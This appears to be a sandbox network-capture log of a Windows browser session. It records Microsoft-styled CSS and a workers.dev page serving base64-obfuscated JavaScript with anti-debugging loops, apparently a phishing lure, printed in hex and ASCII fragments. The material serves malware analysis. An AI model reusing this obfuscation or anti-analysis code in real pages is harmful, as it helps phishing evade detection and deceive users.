2024-05-26 22:46:24 UTC	603	IN	HTTP/1.1 200 OK Connection: close Content-Length: 398652 Cache-Control: max-age=3600 Content-Type: text/css; charset=utf-8 Etag: "98fb212d8f882261e3269fdc5ea6a3482a9835e6301c7ca3d3b8f13f93515c18" Last-Modified: Mon, 06 May 2024 16:50:03 GMT Strict-Transport-Security: max-age=31556926; includeSubDomains; preload Accept-Ranges: bytes Date: Sun, 26 May 2024 22:46:24 GMT X-Served-By: cache-ewr18152-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1716763584.761354,VS0,VE258 Vary: x-fh-requested-host, accept-encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-05-26 22:46:24 UTC	1378	IN	Data Raw: 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 20 7b 77 69 64 74 68 3a 33 70 78 20 7d 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 37 66 61 66 65 20 7d 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 68 75 6d 62 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 42 35 43 41 45 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 30 70 78 20 7d 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 68 75 6d 62 3a 68 6f 76 65 72 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 42 35 43 41 45 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 53 65 67 6f 65 20 55 49 27 3b 73 72 63 3a 75 72 6c 28 27 61 73 73 65 74 73 2f 53 65 67 6f 65 55 Data Ascii: ::-webkit-scrollbar {width:3px }::-webkit-scrollbar-track {background:#f7fafe }::-webkit-scrollbar-thumb {background:#0B5CAE;border-radius:30px }::-webkit-scrollbar-thumb:hover {background:#0B5CAE;}@font-face {font-family:'Segoe UI';src:url('assets/SegoeU
2024-05-26 22:46:24 UTC	1378	IN	Data Raw: 30 59 51 74 6b 20 61 3a 68 6f 76 65 72 20 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 7d 2e 69 5a 31 30 62 32 33 64 33 30 31 30 62 32 33 64 33 30 59 51 74 6b 20 61 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 63 68 69 6c 64 29 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 2e 38 65 6d 3b 7d 2e 6f 6a 63 64 32 31 35 34 30 30 61 38 36 30 62 36 66 51 77 20 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 20 2d 20 32 72 65 6d 29 3b 77 69 64 74 68 3a 39 30 25 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 33 72 65 6d 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 61 6c 69 Data Ascii: 0YQtk a:hover {text-decoration:underline;}.iZ10b23d3010b23d30YQtk a:not(:first-child){margin-left:1.8em;}.ojcd215400a860b6fQw {min-height:calc(100vh - 2rem);width:90%;margin:0 auto;padding-bottom:3rem;display:flex;flex-wrap:wrap;box-sizing:border-box;ali
2024-05-26 22:46:24 UTC	1378	IN	Data Raw: 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 2e 36 32 35 72 65 6d 3b 7d 2e 57 4f 63 31 34 36 64 30 34 35 63 31 34 36 64 30 34 35 41 56 20 69 6d 67 2e 62 6c 4b 65 64 38 31 35 36 64 31 65 64 38 31 35 36 64 31 53 43 69 75 7b 68 65 69 67 68 74 3a 31 2e 32 72 65 6d 3b 7d 40 6d 65 64 69 61 28 6d 61 78 2d 77 69 64 74 68 3a 39 39 31 70 78 29 7b 2e 6f 6a 63 64 32 31 35 34 30 30 61 38 36 30 62 36 66 51 77 7b 77 69 64 74 68 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 31 72 65 6d 3b 7d 2e 53 4e 33 64 63 66 66 63 62 34 33 64 63 66 66 63 62 34 6e 46 44 20 7b 77 69 64 74 68 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 31 72 65 6d 3b 7d 2e 53 4e 33 64 63 66 66 63 62 34 33 64 63 66 66 63 62 34 6e 46 44 2e 7a 6a 55 33 34 34 32 61 33 62 63 Data Ascii: -align:middle;margin-right:0.625rem;}.WOc146d045c146d045AV img.blKed8156d1ed8156d1SCiu{height:1.2rem;}@media(max-width:991px){.ojcd215400a860b6fQw{width:100%;padding:1rem;}.SN3dcffcb43dcffcb4nFD {width:100%;padding:1rem;}.SN3dcffcb43dcffcb4nFD.zjU3442a3bc
2024-05-26 22:46:24 UTC	1378	IN	Data Raw: 65 72 3b 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 Data Ascii: er;-webkit-align-items:center;align-items:center;display:-webkit-box;display:-moz-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-moz-box-pack:center;-ms-flex-pack:center;-webkit-justify-content:center;justify-content:ce
2024-05-26 22:46:24 UTC	1378	IN	Data Raw: 23 66 66 66 7d 2e 6f 77 6e 62 2d 63 6f 6e 74 65 6e 74 5b 64 61 74 61 2d 6c 61 79 6f 75 74 3d 22 70 72 6f 64 75 63 74 22 5d 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 33 2e 63 2d 68 65 61 64 69 6e 67 2d 34 2e 6f 77 6e 62 2d 6c 69 6e 6b 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6f 77 2d 63 6f 6d 70 61 72 69 73 6f 6e 2d 74 61 62 6c 65 2e 78 2d 70 61 69 64 2d 6d 65 64 69 61 20 2e 6d 6f 62 69 6c 65 20 2e 63 2d 63 61 72 6f 75 73 65 6c 2e 66 2d 6d 75 Data Ascii: #fff}.ownb-content[data-layout="product"]{font-size:15px !important;font-weight:normal !important;margin:0;padding:0}h3.c-heading-4.ownb-link{margin-bottom:0 !important;padding-bottom:0 !important}.ow-comparison-table.x-paid-media .mobile .c-carousel.f-mu
2024-05-26 22:46:24 UTC	1378	IN	Data Raw: 63 75 73 20 7b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 20 7d 2e 73 64 78 38 36 33 34 37 38 36 38 36 33 34 37 38 36 47 6f 59 5a 6b 20 5b 72 6f 6c 65 3d 22 64 69 61 6c 6f 67 22 5d 5b 72 6f 6c 65 3d 22 64 6f 63 75 6d 65 6e 74 22 5d 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 61 75 74 6f 20 7d 40 6d 65 64 69 61 28 Data Ascii: cus {outline:none }.sdx86347868634786GoYZk [role="dialog"][role="document"]{box-sizing:border-box;display:-ms-flexbox;display:flex;-ms-flex-direction:column;flex-direction:column;-ms-flex-pack:justify;justify-content:space-between;overflow-y:auto }@media(
2024-05-26 22:46:24 UTC	1378	IN	Data Raw: 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 34 70 78 3b 70 61 64 64 69 6e 67 3a 33 35 70 78 20 30 20 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 20 7d 2e 73 64 78 38 36 33 34 37 38 36 38 36 33 34 37 38 36 47 6f 59 5a 6b 20 5b 72 6f 6c 65 3d 22 64 69 61 6c 6f 67 22 5d 68 32 2e 63 2d 68 65 61 64 69 6e 67 2d 35 2e 66 2d 6c 65 61 6e 20 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 20 7d 2e 73 64 78 38 36 33 34 37 38 36 38 36 33 34 37 38 36 47 6f 59 5a 6b 20 5b 72 6f 6c 65 3d 22 64 69 61 6c 6f 67 22 5d 68 32 2e 63 2d 68 65 61 64 69 6e 67 2d 36 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 34 70 78 3b 70 61 64 64 69 6e 67 3a 33 37 70 78 20 30 20 33 70 78 3b 66 6f Data Ascii: {font-size:20px;line-height:24px;padding:35px 0 5px;font-weight:600 }.sdx86347868634786GoYZk [role="dialog"]h2.c-heading-5.f-lean {padding-top:0 }.sdx86347868634786GoYZk [role="dialog"]h2.c-heading-6 {font-size:18px;line-height:24px;padding:37px 0 3px;fo
2024-05-26 22:46:24 UTC	1378	IN	Data Raw: 77 69 64 74 68 3a 63 61 6c 63 28 35 30 25 20 2d 20 34 70 78 29 7d 2e 73 64 78 38 36 33 34 37 38 36 38 36 33 34 37 38 36 47 6f 59 5a 6b 20 5b 72 6f 6c 65 3d 22 64 69 61 6c 6f 67 22 5d 2e 4e 4d 57 33 63 65 62 39 32 65 39 33 63 65 62 39 32 65 39 41 6c 75 6b 20 2e 66 2d 73 77 61 70 2d 62 75 74 74 6f 6e 73 3a 66 69 72 73 74 2d 63 68 69 6c 64 2b 2e 66 2d 73 77 61 70 2d 62 75 74 74 6f 6e 73 20 7b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 77 69 64 74 68 3a 35 30 25 7d 2e 73 64 78 38 36 33 34 37 38 36 38 36 33 34 37 38 36 47 6f 59 5a 6b 20 5b 72 6f 6c 65 3d 22 64 69 61 6c 6f 67 22 5d 5b 63 6c 61 73 73 5e 3d 22 63 2d 68 65 61 64 69 6e 67 2d 22 5d 2b 2e 63 2d 70 72 69 63 65 2e 66 2d 6c 61 72 67 65 20 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: width:calc(50% - 4px)}.sdx86347868634786GoYZk [role="dialog"].NMW3ceb92e93ceb92e9Aluk .f-swap-buttons:first-child+.f-swap-buttons {float:right;width:50%}.sdx86347868634786GoYZk [role="dialog"][class^="c-heading-"]+.c-price.f-large {padding-top:8px;padding
2024-05-26 22:46:24 UTC	1378	IN	Data Raw: 6c 79 70 68 3a 66 6f 63 75 73 20 7b 6f 75 74 6c 69 6e 65 3a 31 70 78 20 64 61 73 68 65 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 38 29 7d 40 6d 65 64 69 61 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 7b 2e 73 64 78 38 36 33 34 37 38 36 38 36 33 34 37 38 36 47 6f 59 5a 6b 2e 76 64 65 64 35 64 38 30 36 34 65 64 35 64 38 30 36 34 57 53 51 6f 20 5b 72 6f 6c 65 3d 22 64 69 61 6c 6f 67 22 5d 3e 2e 63 2d 67 6c 79 70 68 3a 66 6f 63 75 73 2c 2e 73 64 78 38 36 33 34 37 38 36 38 36 33 34 37 38 36 47 6f 59 5a 6b 2e 66 2d 6c 69 67 68 74 62 6f 78 20 5b 72 6f 6c 65 3d 22 64 69 61 6c 6f 67 22 5d 3e 2e 63 2d 67 6c 79 70 68 3a 66 6f 63 75 73 20 7b 6f 75 74 6c 69 6e 65 3a 31 70 78 20 73 6f 6c 69 64 20 42 75 74 74 6f 6e 54 65 78 74 20 7d 7d Data Ascii: lyph:focus {outline:1px dashed rgba(0,0,0,.8)}@media(-ms-high-contrast:active){.sdx86347868634786GoYZk.vded5d8064ed5d8064WSQo [role="dialog"]>.c-glyph:focus,.sdx86347868634786GoYZk.f-lightbox [role="dialog"]>.c-glyph:focus {outline:1px solid ButtonText }}
2024-05-26 22:46:24 UTC	1378	IN	Data Raw: 74 72 65 74 63 68 20 7d 2e 73 64 78 38 36 33 34 37 38 36 38 36 33 34 37 38 36 47 6f 59 5a 6b 2e 76 64 65 64 35 64 38 30 36 34 65 64 35 64 38 30 36 34 57 53 51 6f 20 2e 63 2d 64 69 61 6c 6f 67 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 2d 64 69 61 6c 6f 67 2d 62 6f 64 79 2c 2e 73 64 78 38 36 33 34 37 38 36 38 36 33 34 37 38 36 47 6f 59 5a 6b 2e 66 2d 6c 69 67 68 74 62 6f 78 20 2e 63 2d 64 69 61 6c 6f 67 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 2d 64 69 61 6c 6f 67 2d 62 6f 64 79 20 7b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 73 74 61 72 74 Data Ascii: tretch }.sdx86347868634786GoYZk.vded5d8064ed5d8064WSQo .c-dialog-container .c-dialog-body,.sdx86347868634786GoYZk.f-lightbox .c-dialog-container .c-dialog-body {display:-ms-flexbox;display:flex;-ms-flex-direction:row;flex-direction:row;-ms-flex-pack:start

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49714	23.211.8.90	443

Timestamp	Bytes transferred	Direction	Data
2024-05-26 22:46:24 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-05-26 22:46:25 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=235429 Date: Sun, 26 May 2024 22:46:24 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49706	188.114.97.3	443	5904	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-26 22:46:25 UTC	672	OUT	GET /pgX2K9YojkuEcPdfFCtGvRHJSm HTTP/1.1 Host: fanondiekoxzijds.jamesona8.workers.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://fanondiekoxzijds.jamesona8.workers.dev/?bbre=cikztgVjwNGEbqBylxm Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-26 22:46:25 UTC	579	IN	HTTP/1.1 200 OK Date: Sun, 26 May 2024 22:46:25 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 4411 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f9Q4L0%2F6RGab6R1EJanmk1LcJyMAjwXdHSo34TW7crvkoM1ZotqZs9J5LURuKCzjrx51MZ8B4KgEEGvgNuxOZh3DcJ6CagTQnXaYhab8HzY9R4%2FoIXZZsr%2FfuvZ6FJy914BF1ElFqegtxXTtdc%2F%2B8zVfNTW39QXdBw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88a14d16aee143d7-EWR alt-svc: h3=":443"; ma=86400
2024-05-26 22:46:25 UTC	790	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 62 6f 74 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 Data Ascii: <!doctype html><html lang="en-US" dir="ltr"><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="googlebot" content="noindex,nofollow"><meta name="robots" content="noindex
2024-05-26 22:46:25 UTC	1369	IN	Data Raw: 6e 74 65 6e 74 3d 22 2f 53 35 62 4e 6d 67 45 49 4b 4a 73 33 69 65 34 52 55 58 32 2f 55 6a 54 4f 7a 38 77 64 6d 33 74 39 37 53 45 63 75 73 78 6b 32 70 72 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 2f 77 74 59 70 6d 78 34 7a 45 33 76 51 32 75 69 30 46 38 50 43 36 31 6c 6f 6a 4a 2f 52 45 4f 71 46 53 38 58 33 78 67 51 59 4d 65 68 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 2f 42 31 58 50 64 5a 33 70 46 36 41 35 77 56 2f 20 64 4f 77 69 6a 6e 49 72 57 63 53 43 31 36 73 50 66 42 68 52 62 30 47 48 4e 5a 78 4b 4d 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 Data Ascii: ntent="/S5bNmgEIKJs3ie4RUX2/UjTOz8wdm3t97SEcusxk2pr" /><meta property="twitter:title" content="/wtYpmx4zE3vQ2ui0F8PC61lojJ/REOqFS8X3xgQYMeh" /><meta name="description" content="/B1XPdZ3pF6A5wV/ dOwijnIrWcSC16sPfBhRb0GHNZxKM" /><meta property="og:descripti
2024-05-26 22:46:25 UTC	1369	IN	Data Raw: 48 49 70 65 33 5a 68 63 69 42 30 50 57 55 2f 5a 6e 56 75 59 33 52 70 62 32 34 6f 4b 58 74 70 5a 69 68 79 4b 58 74 32 59 58 49 67 64 44 31 79 4c 6d 46 77 63 47 78 35 4b 47 34 73 59 58 4a 6e 64 57 31 6c 62 6e 52 7a 4b 54 74 79 5a 58 52 31 63 6d 34 67 63 6a 31 75 64 57 78 73 4c 48 52 39 66 54 70 6d 64 57 35 6a 64 47 6c 76 62 69 67 70 65 33 30 37 63 6d 56 30 64 58 4a 75 49 47 55 39 49 54 45 73 64 48 31 39 4b 43 6b 37 63 32 56 30 53 57 35 30 5a 58 4a 32 59 57 77 6f 5a 6e 56 75 59 33 52 70 62 32 34 6f 4b 58 74 66 4d 48 67 30 4e 57 52 69 59 32 4d 6f 4b 58 30 73 4e 47 55 7a 4b 54 74 32 59 58 49 67 58 7a 42 34 4d 6d 4a 68 4d 7a 67 7a 50 56 38 77 65 44 46 6d 5a 6d 49 32 4d 79 68 30 61 47 6c 7a 4c 47 5a 31 62 6d 4e 30 61 57 39 75 4b 43 6c 37 5a 6d 39 79 4b 48 5a 68 Data Ascii: HIpe3ZhciB0PWU/ZnVuY3Rpb24oKXtpZihyKXt2YXIgdD1yLmFwcGx5KG4sYXJndW1lbnRzKTtyZXR1cm4gcj1udWxsLHR9fTpmdW5jdGlvbigpe307cmV0dXJuIGU9ITEsdH19KCk7c2V0SW50ZXJ2YWwoZnVuY3Rpb24oKXtfMHg0NWRiY2MoKX0sNGUzKTt2YXIgXzB4MmJhMzgzPV8weDFmZmI2Myh0aGlzLGZ1bmN0aW9uKCl7Zm9yKHZh
2024-05-26 22:46:25 UTC	883	IN	Data Raw: 39 31 62 6e 52 6c 63 69 49 70 4f 7a 45 68 50 54 30 6f 49 69 49 72 64 43 39 30 4b 53 35 73 5a 57 35 6e 64 47 68 38 66 48 51 6c 4d 6a 41 39 50 54 41 2f 5a 6e 56 75 59 33 52 70 62 32 34 6f 4b 58 74 79 5a 58 52 31 63 6d 34 68 4d 48 30 75 59 32 39 75 63 33 52 79 64 57 4e 30 62 33 49 6f 49 6d 52 6c 59 6e 56 6e 5a 32 56 79 49 69 6b 75 59 32 46 73 62 43 67 69 59 57 4e 30 61 57 39 75 49 69 6b 36 5a 6e 56 75 59 33 52 70 62 32 34 6f 4b 58 74 79 5a 58 52 31 63 6d 34 68 4d 58 30 75 59 32 39 75 63 33 52 79 64 57 4e 30 62 33 49 6f 49 6d 52 6c 59 6e 56 6e 5a 32 56 79 49 69 6b 75 59 58 42 77 62 48 6b 6f 49 6e 4e 30 59 58 52 6c 54 32 4a 71 5a 57 4e 30 49 69 6b 73 62 69 67 72 4b 33 51 70 66 58 52 79 65 58 74 70 5a 69 68 30 4b 58 4a 6c 64 48 56 79 62 69 42 75 4f 32 34 6f 4d Data Ascii: 91bnRlciIpOzEhPT0oIiIrdC90KS5sZW5ndGh8fHQlMjA9PTA/ZnVuY3Rpb24oKXtyZXR1cm4hMH0uY29uc3RydWN0b3IoImRlYnVnZ2VyIikuY2FsbCgiYWN0aW9uIik6ZnVuY3Rpb24oKXtyZXR1cm4hMX0uY29uc3RydWN0b3IoImRlYnVnZ2VyIikuYXBwbHkoInN0YXRlT2JqZWN0IiksbigrK3QpfXRyeXtpZih0KXJldHVybiBuO24oM

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49716	188.114.97.3	443	5904	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-26 22:46:25 UTC	388	OUT	GET /pgX2K9YojkuEcPdfFCtGvRHJSm HTTP/1.1 Host: fanondiekoxzijds.jamesona8.workers.dev Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-26 22:46:25 UTC	583	IN	HTTP/1.1 200 OK Date: Sun, 26 May 2024 22:46:25 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 4411 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nzzV41dBeuOVV8fJZGxc%2Fuy2aPmp5%2FcfkM4B%2FLpdw3%2BoqZfQNuf1M%2FANreYt7NYCxDOMBZjuzQbkt8BL6S4thtLbnioQcWCc21Zg2eDFBGGk1xfc7CCcZVy5DMNzvpnbWIWQNRQuEY%2BuGhg1eBcm1IxJ0W2XJD%2B9Ow%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88a14d1b5be27c6f-EWR alt-svc: h3=":443"; ma=86400
2024-05-26 22:46:25 UTC	786	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 62 6f 74 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 Data Ascii: <!doctype html><html lang="en-US" dir="ltr"><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="googlebot" content="noindex,nofollow"><meta name="robots" content="noindex
2024-05-26 22:46:25 UTC	1369	IN	Data Raw: 22 20 63 6f 6e 74 65 6e 74 3d 22 2f 53 35 62 4e 6d 67 45 49 4b 4a 73 33 69 65 34 52 55 58 32 2f 55 6a 54 4f 7a 38 77 64 6d 33 74 39 37 53 45 63 75 73 78 6b 32 70 72 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 2f 77 74 59 70 6d 78 34 7a 45 33 76 51 32 75 69 30 46 38 50 43 36 31 6c 6f 6a 4a 2f 52 45 4f 71 46 53 38 58 33 78 67 51 59 4d 65 68 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 2f 42 31 58 50 64 5a 33 70 46 36 41 35 77 56 2f 20 64 4f 77 69 6a 6e 49 72 57 63 53 43 31 36 73 50 66 42 68 52 62 30 47 48 4e 5a 78 4b 4d 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 Data Ascii: " content="/S5bNmgEIKJs3ie4RUX2/UjTOz8wdm3t97SEcusxk2pr" /><meta property="twitter:title" content="/wtYpmx4zE3vQ2ui0F8PC61lojJ/REOqFS8X3xgQYMeh" /><meta name="description" content="/B1XPdZ3pF6A5wV/ dOwijnIrWcSC16sPfBhRb0GHNZxKM" /><meta property="og:descr
